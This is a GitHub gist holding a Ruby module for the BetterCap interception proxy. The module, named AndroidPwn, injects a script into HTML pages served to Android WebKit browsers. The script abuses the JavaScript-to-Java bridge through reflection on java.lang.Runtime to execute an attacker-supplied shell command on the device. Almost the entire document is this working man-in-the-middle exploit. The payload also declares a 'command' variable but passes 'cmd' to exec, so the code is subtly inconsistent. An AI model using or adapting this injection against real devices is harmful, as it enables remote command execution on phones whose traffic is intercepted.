Skip to content

Instantly share code, notes, and snippets.

@evilsocket
Created January 19, 2016 06:01
Show Gist options
  • Save evilsocket/2e91719839d3fd6b06d6 to your computer and use it in GitHub Desktop.
Save evilsocket/2e91719839d3fd6b06d6 to your computer and use it in GitHub Desktop.
class AndroidPwn < BetterCap::Proxy::Module
@@command = nil
@@payload = "<script>\n" +
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
"for(i in top) {\n" +
" try {\n" +
" top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
" break;\n" +
" }\n" +
"catch(e) {}\n" +
"}\n" +
"</script>"
def self.on_options(opts)
opts.separator ""
opts.separator "AndroidPwn Proxy Module Options:"
opts.separator ""
opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
@@command = v.strip
@@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
end
end
def initialize
raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
end
def on_request( request, response )
if is_exploitable?( request, response )
BetterCap::Logger.info ""
BetterCap::Logger.info "Pwning Android Device :".red
BetterCap::Logger.info " URL : http://#{request.host}#{request.url}"
BetterCap::Logger.info " AGENT : #{request.headers['User-Agent']}"
BetterCap::Logger.info ""
response.body.sub!( '</head>', "</head>#{@@payload}" )
end
end
private
def is_exploitable?(req,res)
req.headers.has_key?('User-Agent') and \
req.headers['User-Agent'].include?("Android") and \
req.headers['User-Agent'].include?("AppleWebKit") and \
res.content_type =~ /^text\/html.*/ and \
res.code == '200'
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment